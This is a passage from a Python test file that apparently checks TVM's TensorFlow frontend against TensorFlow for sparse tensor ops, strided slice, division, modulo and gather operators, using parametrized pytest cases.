_test_batch_matmul_dynamic(
(None, None, None, 5, 6),
(None, None, None, 6, 5),
(2, 3, 4, 5, 6),
(2, 3, 4, 6, 5),
"float32",
)
#######################################################################
# SparseTensorDenseMatMul
# ----------------------------------
def _test_sparse_dense_matmul(indices, values, A_inp_shape, B_inp_shape, dtype, flip=False):
""" One iteration of sparse_dense_matmul """
for adjoint_a in [False, True]:
for adjoint_b in [False, True]:
A_shape = A_inp_shape[::-1] if adjoint_a else A_inp_shape
B_shape = B_inp_shape[::-1] if adjoint_b else B_inp_shape
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=A_shape)
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
if flip:
result = tf.sparse.sparse_dense_matmul(
B, A_sp, adjoint_a=adjoint_b, adjoint_b=adjoint_a
)
else:
result = tf.sparse.sparse_dense_matmul(
A_sp, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b
)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([B_np], [B.name], result.name)
def test_forward_sparse_dense_matmul():
""" sparse_dense_matmul op test"""
###################################################################
#
    # In order to create a SparseTensor, it requires 3 inputs as below:
    #   SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
    #
    # The above sparse tensor can be represented in dense form as below:
    #   [[1, 0, 0, 0]
    #    [0, 0, 2, 0]
    #    [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [4, 3], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 3], [3, 3], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [7, 9], [9, 5], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [4, 3], [3, 4], "float32", True)
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 3], [3, 3], "float32", True)
_test_sparse_dense_matmul(
[[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], "float32", True
)
_test_sparse_dense_matmul(
[[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [9, 5], [7, 9], "float32", True
)
#######################################################################
# SparseFillEmptyRows
# ------------
def _test_sparse_fill_empty_rows(indices_np, values_np, dense_shape_np, default_value_int, use_dyn):
with tf.Graph().as_default():
if use_dyn:
indices = tf.placeholder(shape=(None, None), dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=(None), dtype=values_np.dtype, name="values")
dense_shape = tf.placeholder(
shape=(None), dtype=dense_shape_np.dtype, name="dense_shape"
)
else:
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=values_np.shape, dtype=values_np.dtype, name="values")
dense_shape = tf.placeholder(
shape=dense_shape_np.shape, dtype=dense_shape_np.dtype, name="dense_shape"
)
default_value = tf.placeholder(shape=(), dtype=values_np.dtype, name="default_value")
sp_input = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=dense_shape)
_ = tf.sparse.fill_empty_rows(sp_input, default_value, name="sparse_fill_empty_rows")
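        # SparseFillEmptyRows returns the filled indices (:0), the filled values (:1)
        # and the empty-row indicator (:2); all three outputs are compared below.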
compare_tf_with_tvm(
[indices_np, values_np, dense_shape_np, default_value_int],
[indices.name, values.name, dense_shape.name, default_value.name],
[
"sparse_fill_empty_rows/SparseFillEmptyRows:0",
"sparse_fill_empty_rows/SparseFillEmptyRows:1",
"sparse_fill_empty_rows/SparseFillEmptyRows:2",
],
mode="vm",
)
@pytest.mark.parametrize(
"sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int",
[
(
np.array([[1, 1], [0, 3], [0, 1], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4, 5], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[1, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[0, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[1, 1, 1], [1, 3, 1], [2, 0, 5], [3, 1, 6]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([7, 7, 7], dtype=np.int64),
5,
),
(
np.array([[1], [2]], dtype=np.int64),
np.array([7, 8], dtype=np.int64),
np.array([5], dtype=np.int64),
4,
),
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([5], dtype=np.int64),
4,
),
(
np.ones((0, 3), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([9, 3, 7], dtype=np.int64),
100,
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_sparse_fill_empty_rows(
sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int, use_dyn
):
""" sparse_fill_empty_rows op test"""
###################################################################
#
    # In order to create a SparseTensor, it requires 3 inputs as below:
    #   SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
    #
    # The above sparse tensor can be represented in dense form as below:
    #   [[1, 0, 0, 0]
    #    [0, 0, 2, 0]
    #    [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_fill_empty_rows(
sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int, use_dyn
)
#######################################################################
# SparseReshape
# ------------
def _test_sparse_reshape(indices_np, values_np, prev_shape_np, new_shape_np, use_dyn=False):
with tf.Graph().as_default():
if use_dyn:
indices = tf.placeholder(shape=(None, None), dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=(None), dtype=values_np.dtype, name="values")
prev_shape = tf.placeholder(shape=(None), dtype=prev_shape_np.dtype, name="prev_shape")
new_shape = tf.placeholder(shape=(None), dtype=new_shape_np.dtype, name="new_shape")
else:
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=values_np.shape, dtype=values_np.dtype, name="values")
prev_shape = tf.placeholder(
shape=prev_shape_np.shape, dtype=prev_shape_np.dtype, name="prev_shape"
)
new_shape = tf.placeholder(
shape=new_shape_np.shape, dtype=new_shape_np.dtype, name="new_shape"
)
sp_input = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=prev_shape)
_ = tf.sparse.reshape(sp_input, new_shape, name="sparse_reshape")
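        # The fetched tensors are the reshaped indices ("sparse_reshape:0"), the new
        # dense shape ("sparse_reshape:1") and the unchanged values, which pass through
        # an Identity node ("sparse_reshape/Identity:0").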
compare_tf_with_tvm(
[indices_np, values_np, prev_shape_np, new_shape_np],
[indices.name, values.name, prev_shape.name, new_shape.name],
["sparse_reshape:0", "sparse_reshape:1", "sparse_reshape/Identity:0"],
mode="vm",
)
@pytest.mark.parametrize(
"sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np",
[
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([4], dtype=np.int64),
np.array([2, -1], dtype=np.int64),
),
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([4], dtype=np.int64),
np.array([2, 2], dtype=np.int64),
),
(
np.ones((0, 2), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([3, 6], dtype=np.int64),
np.array([-1, 2], dtype=np.int64),
),
(
np.array([[0, 0, 0], [0, 0, 1], [0, 1, 0], [1, 0, 0], [1, 2, 3]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([2, 3, 6], dtype=np.int64),
np.array([-1, 9], dtype=np.int64),
),
(
np.array(
[
[0, 0, 0, 0, 0],
[0, 0, 1, 2, 3],
[0, 1, 0, 3, 5],
[1, 0, 0, 4, 6],
[1, 2, 3, 6, 8],
],
dtype=np.int64,
),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([2, 3, 6, 7, 9], dtype=np.int64),
np.array([9, -1, 7], dtype=np.int64),
),
(
np.array([[0, 0], [0, 1], [3, 4], [4, 3], [7, 3]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([9, 4], dtype=np.int64),
np.array([-1], dtype=np.int64),
),
(
np.array([[0], [5], [10], [20], [24]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([25], dtype=np.int64),
np.array([5, 5], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([500, -1], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([250, 40], dtype=np.int64),
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_sparse_reshape(
sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn
):
""" sparse_reshape op test"""
###################################################################
#
    # In order to create a SparseTensor, it requires 3 inputs as below:
    #   SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
    #
    # The above sparse tensor can be represented in dense form as below:
    #   [[1, 0, 0, 0]
    #    [0, 0, 2, 0]
    #    [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_reshape(sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn)
#######################################################################
# Sparse Segment Variants
# ------------
def _test_sparse_segment_variant(
tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn=False
):
with tf.Graph().as_default():
if use_dyn:
data = tf.placeholder(
shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
)
indices = tf.placeholder(shape=[None], dtype=indices_np.dtype, name="indices")
segment_ids = tf.placeholder(
shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
)
else:
data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
segment_ids = tf.placeholder(
shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
)
_ = tf_op(
data, indices, segment_ids, num_segments=num_segments, name="sparse_segment_variant"
)
compare_tf_with_tvm(
[data_np, indices_np, segment_ids_np],
[data.name, indices.name, segment_ids.name],
["sparse_segment_variant:0"],
mode="vm",
)
@pytest.mark.parametrize(
"data_np, indices_np, segment_ids_np, num_segments",
[
(
np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
np.array([0, 3, 4], dtype=np.int32),
np.array([0, 1, 1], dtype=np.int32),
None,
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 1], dtype=np.int32),
np.array([0, 2], dtype=np.int32),
4,
),
(
np.random.random((6, 4, 5)),
np.array([0, 2, 4, 3, 1], dtype=np.int32),
np.array([0, 0, 1, 5, 5], dtype=np.int32),
100,
),
(
np.random.random((6, 4, 5)),
np.array([0, 2, 4, 3, 1], dtype=np.int32),
np.array([0, 0, 1, 5, 5], dtype=np.int32),
None,
),
(
np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float64),
np.array([0, 1, 2], dtype=np.int32),
np.array([0, 0, 1], dtype=np.int32),
None,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
9,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
None,
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 1], dtype=np.int32),
np.array([0, 2], dtype=np.int32),
None,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 5, 5, 5, 5], dtype=np.int32),
6,
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
@pytest.mark.parametrize(
"tf_op",
[
tf.sparse.segment_sum,
tf.sparse.segment_sqrt_n,
tf.sparse.segment_mean,
],
)
def test_forward_sparse_segment_sum_variants(
tf_op,
data_np,
indices_np,
segment_ids_np,
num_segments,
use_dyn,
):
"""sparse segment sum variants tests"""
_test_sparse_segment_variant(tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn)
#######################################################################
# Math SegmentSum
# ------------
def _test_math_segment_sum(data_np, segment_ids_np, use_dyn=False):
with tf.Graph().as_default():
if use_dyn:
data = tf.placeholder(
shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
)
segment_ids = tf.placeholder(
shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
)
else:
data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
segment_ids = tf.placeholder(
shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
)
_ = tf.math.segment_sum(data, segment_ids, name="segment_sum")
compare_tf_with_tvm(
[data_np, segment_ids_np],
[data.name, segment_ids.name],
["segment_sum:0"],
mode="vm",
)
@pytest.mark.parametrize(
"data_np, segment_ids_np",
[
(
np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
np.array([0, 0, 0, 1, 1, 1], dtype=np.int32),
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 0, 1], dtype=np.int32),
),
(
np.random.random((6, 4, 5)),
np.array([0, 0, 1, 2, 2, 3], dtype=np.int64),
),
(
np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float32),
np.array([0, 0, 1], dtype=np.int32),
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 0, 0, 1, 2, 3, 4, 4, 5], dtype=np.int64),
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_math_segment_sum(data_np, segment_ids_np, use_dyn):
"""math segment sum test"""
_test_math_segment_sum(data_np, segment_ids_np, use_dyn)
# tensorflow.compat.v1.sparse_to_dense
# ---------------
def _test_sparse_to_dense(sparse_indices, sparse_values, default_value, output_shape):
with tf.Graph().as_default():
indices = tf.placeholder(
shape=sparse_indices.shape, dtype=str(sparse_indices.dtype), name="indices"
)
values = tf.placeholder(
shape=sparse_values.shape, dtype=str(sparse_values.dtype), name="values"
)
oshape = tf.constant(output_shape, shape=output_shape.shape, dtype=str(output_shape.dtype))
        if default_value is None:
output = tf.sparse_to_dense(indices, oshape, values)
compare_tf_with_tvm(
[sparse_indices, sparse_values], ["indices:0", "values:0"], output.name
)
else:
dv = tf.placeholder(shape=(), dtype=str(default_value.dtype), name="default_value")
output = tf.sparse_to_dense(indices, oshape, values, dv)
compare_tf_with_tvm(
[sparse_indices, sparse_values, default_value],
["indices:0", "values:0", "default_value:0"],
output.name,
)
def test_forward_sparse_to_dense():
# scalar
_test_sparse_to_dense(
sparse_indices=np.int32(1),
sparse_values=np.int32(3),
default_value=np.int32(0),
output_shape=np.array([5]).astype("int32"),
)
# vector
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3, 3, 3]).astype("int32"),
default_value=np.int32(0),
output_shape=np.array([5]).astype("int32"),
)
# vector nXd
_test_sparse_to_dense(
sparse_indices=np.array([[0, 0], [1, 2]]).astype("int32"),
sparse_values=np.array([1, 2]).astype("int32"),
default_value=np.int32(0),
output_shape=np.array([3, 4]).astype("int32"),
)
_test_sparse_to_dense(
sparse_indices=np.array([[0, 0, 0], [1, 2, 3]]).astype("int32"),
sparse_values=np.array([1, 2]).astype("int32"),
default_value=np.int32(4),
output_shape=np.array([2, 3, 4]).astype("int32"),
)
# floats
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3.1, 3.1, 3.1]).astype("float32"),
default_value=np.float32(3.5),
output_shape=np.array([5]).astype("int32"),
)
# default value not specified
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3.1, 3.1, 3.1]).astype("float32"),
default_value=None,
output_shape=np.array([5]).astype("int32"),
)
#######################################################################
# tensorflow.sparse.to_dense
# ---------------
def _test_sparse_to_dense_v2(indices, values, A_shape, dtype, default_value=None):
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=A_shape)
result = tf.sparse.to_dense(A_sp, default_value=default_value)
compare_tf_with_tvm([], [], result.name)
def test_forward_sparse_to_dense_v2():
_test_sparse_to_dense_v2([[1]], [3.0], [5], "float32")
_test_sparse_to_dense_v2([[1]], [3.0], [5], "float32", 0.3)
_test_sparse_to_dense_v2([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], "float32")
_test_sparse_to_dense_v2([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], "float32", 1.3)
_test_sparse_to_dense_v2([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], "float32")
_test_sparse_to_dense_v2([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], "float32", 1.9)
#######################################################################
# tensorflow.sparse.add
# ----------------------------------
def _test_sparse_add(indices, values, A_shape, B_shape, dtype, flip=False):
""" One iteration of tf.sparse.add """
    # TODO(ANSHUMAN87): support cuda
    # TODO(ANSHUMAN87): support the case where both inputs are sparse
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(
indices=indices, values=np.array(values).astype(dtype), dense_shape=A_shape
)
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
        # TODO(ANSHUMAN87): support user-supplied threshold values
if flip:
result = tf.sparse.add(B, A_sp, threshold=0)
else:
result = tf.sparse.add(A_sp, B, threshold=0)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([B_np], [B.name], result.name, no_gpu=True)
def test_sparse_add():
""" sparse.add op test"""
###################################################################
#
# In order to create a SparseTensor, it requires 3 input as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
# Above Sparse can be represented in Dense as below :
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
for dtype_inp in ["float32", "float64", "int32"]:
_test_sparse_add([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [3, 4], dtype_inp)
_test_sparse_add([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [3, 4], dtype_inp, True)
_test_sparse_add([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], dtype_inp)
_test_sparse_add([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], dtype_inp, True)
#######################################################################
# StridedSlice
# ------------
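# The mask arguments used below are bit fields, one bit per slice dimension
# (illustrative summary, not executed):
#   begin_mask / end_mask: ignore begin/end for that dim (slice from the start / to the end)
#   shrink_axis_mask:      treat that dim as an index and drop it, i.e. x[1] instead of x[1:2]
#   new_axis_mask:         insert a length-1 dim at that position, like np.newaxis
#   ellipsis_mask:         that position behaves like `...`
# e.g. tf.strided_slice(x, [1], [1], [1], shrink_axis_mask=1) is roughly x[1]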
def _test_stridedslice(
ip_shape,
begin,
end,
stride,
dtype,
begin_mask=0,
end_mask=0,
new_axis_mask=0,
shrink_axis_mask=0,
ellipsis_mask=0,
):
""" One iteration of a Stridedslice """
tf.reset_default_graph()
np_data = np.random.uniform(size=ip_shape).astype(dtype)
with tf.Graph().as_default():
if len(ip_shape) == 0:
in_data = tf.constant(np_data, dtype)
else:
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.strided_slice(
in_data,
begin,
end,
stride,
begin_mask=begin_mask,
end_mask=end_mask,
new_axis_mask=new_axis_mask,
shrink_axis_mask=shrink_axis_mask,
ellipsis_mask=ellipsis_mask,
name="strided_slice",
)
if len(ip_shape) == 0:
compare_tf_with_tvm(None, "", "strided_slice:0")
else:
compare_tf_with_tvm(np_data, "in_data:0", "strided_slice:0")
def test_forward_stridedslice():
"""test StridedSlice"""
_test_stridedslice([], [0], [0], [1], "float32", new_axis_mask=1)
_test_stridedslice([2], [1], [1], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([2, 1], [0], [1], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([2, 3, 4], [0], [1], [1], "float32", shrink_axis_mask=8)
_test_stridedslice([3, 4, 3], [1, -1, 0], [4, -5, 3], [2, -1, 1], "float32")
_test_stridedslice([3, 4, 3], [1, 0], [4, 3], [2, 1], "float32", ellipsis_mask=8)
_test_stridedslice([3, 4, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 5, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 5, 3], [1, 0, 1], [4, 2, 2], [2, 1, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 3], [1, 1, 0], [4, 4, 2], [2, 1, 1], "float32", new_axis_mask=5)
_test_stridedslice(
[3, 4, 3], [1, 1, 1], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=4
)
_test_stridedslice(
[6, 4, 5], [1, 1, 1], [6, 3, 4], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=5
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=4, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=2
)
_test_stridedslice((3, 4), [1, 0], [4, 4], [1, 1], "float32", shrink_axis_mask=2)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=1, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=1
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6], [0, 0], [2, 3], [1, 1], "float32", shrink_axis_mask=5, new_axis_mask=1
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=5,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=8,
end_mask=8,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=8,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=5,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=16,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=5,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[1, 2, 0, -3],
[4, 5, 3, 3],
[2, 2, 1, 1],
"float32",
shrink_axis_mask=8,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=8,
)
_test_stridedslice(
[1, 13, 13, 3, 2],
[0, 0],
[1, 1],
[1, -1],
"float32",
ellipsis_mask=1,
begin_mask=2,
end_mask=2,
)
#######################################################################
# FloorDiv, RealDiv
# -----------------
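# Sketch of the op semantics these tests exercise (illustrative, not executed):
#   tf.math.divide(7.0, 2.0)  => 3.5   # RealDiv: elementwise true division
#   tf.math.floordiv(7, 2)    => 3     # FloorDiv: rounds toward negative infinity
#   tf.math.floordiv(-7, 2)   => -4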
def _test_forward_divide(ip_shape, dtype):
np_numer = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
np_denomin = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, ip_shape, name="numer")
denominator = tf.placeholder(dtype, ip_shape, name="denomin")
tf.math.divide(numerator, denominator, name="RealDiv")
compare_tf_with_tvm([np_numer, np_denomin], ["numer:0", "denomin:0"], "RealDiv:0")
def _test_forward_floordiv(ip_shape, dtype):
np_numer = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, ip_shape, name="numer")
tf.math.floordiv(numerator, tf.constant(5, dtype=dtype), name="FloorDiv")
compare_tf_with_tvm([np_numer], ["numer:0"], "FloorDiv:0")
def test_forward_divide():
"""test FloorDiv, RealDiv"""
_test_forward_divide((4,), "int32")
_test_forward_divide((4, 3, 7), "float32")
_test_forward_floordiv((4, 3, 7), "float32")
_test_forward_floordiv((4, 3, 7), "int32")
#######################################################################
# FloorMod
# --------
def _test_forward_floormod(in_shape, if_shape, dtype):
np_numer = np.random.uniform(1, 100, size=in_shape).astype(dtype)
np_factor = np.random.uniform(1, 100, size=if_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, in_shape, name="numer")
factor = tf.placeholder(dtype, if_shape, name="factor")
tf.floormod(numerator, factor, name="FloorMod")
compare_tf_with_tvm([np_numer, np_factor], ["numer:0", "factor:0"], "FloorMod:0")
def test_forward_floormod():
"""test FloorMod"""
_test_forward_floormod((10,), (10,), "float32")
_test_forward_floormod((8, 2), (1,), "float32")
_test_forward_floormod((4, 3, 7), (4, 3, 7), "float32")
_test_forward_floormod((4, 3, 7), (4, 3, 7), "int32")
#######################################################################
# TruncateMod
# -----------
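# FloorMod and TruncateMod only differ for negative operands
# (illustrative, not executed):
#   tf.floormod(-7, 3)     => 2    # result takes the sign of the divisor
#   tf.truncatemod(-7, 3)  => -1   # result takes the sign of the dividend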
def _test_forward_truncatemod(ip_shape, dtype):
np_data_1 = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
np_data_2 = np.random.uniform(1, 10, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data_1 = tf.placeholder(dtype, ip_shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, ip_shape, name="in_data_2")
tf.truncatemod(in_data_1, in_data_2, name="truncatemod")
compare_tf_with_tvm([np_data_1, np_data_2], ["in_data_1:0", "in_data_2:0"], "truncatemod:0")
def test_forward_truncatemod():
"""test TruncateMod"""
_test_forward_truncatemod((4, 3, 7), "int32")
#######################################################################
# Gather, GatherV2
# --------------------------
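# Sketch of the op semantics these tests exercise (illustrative, not executed):
#   tf.gather([[1, 2], [3, 4]], indices=[1, 0], axis=0)  => [[3, 4], [1, 2]]
# `indices` selects whole slices along `axis`; the remaining dims are kept.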
def _test_gather(ip_shape, indice_shape, indice_value, axis, dtype):
""" One iteration of a GatherV2 """
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
indices = tf.placeholder("int32", indice_shape, name="indices")
out = tf.gather(in_data, indices, axis=axis)
np_data = np.random.uniform(1, 10, size=ip_shape).astype(dtype)
        def _fill_indices(indice_value):
            if isinstance(indice_value, int):
                return np.array([indice_value], dtype="int32")
            return np.asarray(indice_value, dtype="int32")
np_indices = _fill_indices(indice_value)
compare_tf_with_tvm([np_data, np_indices], ["in_data:0", "indices:0"], out.name)
def test_forward_gather():
"""test Gather/GatherV2 layer"""
_test_gather((4,), (1,), 1, 0, "int32")
_test_gather((4,), (1,), 1, 0, "float32")
_test_gather((1, 4), (1,), [0], 0, "int32")
_test_gather((4,), (1, 2, 2), [[[1, 0], [0, 1]]], 0, "float32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, "int32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 1, "int32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, "float32")
_test_gather((3, 3, 3), (1, 1, 2), [[[1, 0]]], 0, "int32")
_test_gather((3, 3, 3), (1, 1, 2), [[[1, 0]]], 2, "int32")
_test_gather((4, 3, 5, 6), (1, 4), [[2, 1, 0, 0]], 0, "float32")
#######################################################################
# GatherND
# --------------------------
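# Unlike Gather, GatherNd indexes with full coordinate tuples
# (illustrative, not executed):
#   tf.gather_nd([[1, 2], [3, 4]], indices=[[0, 0], [1, 1]])  => [1, 4]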
def _test_gather_nd(ip_shape, indice_value, dtype):
"""test operator GatherNd"""
np_data = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
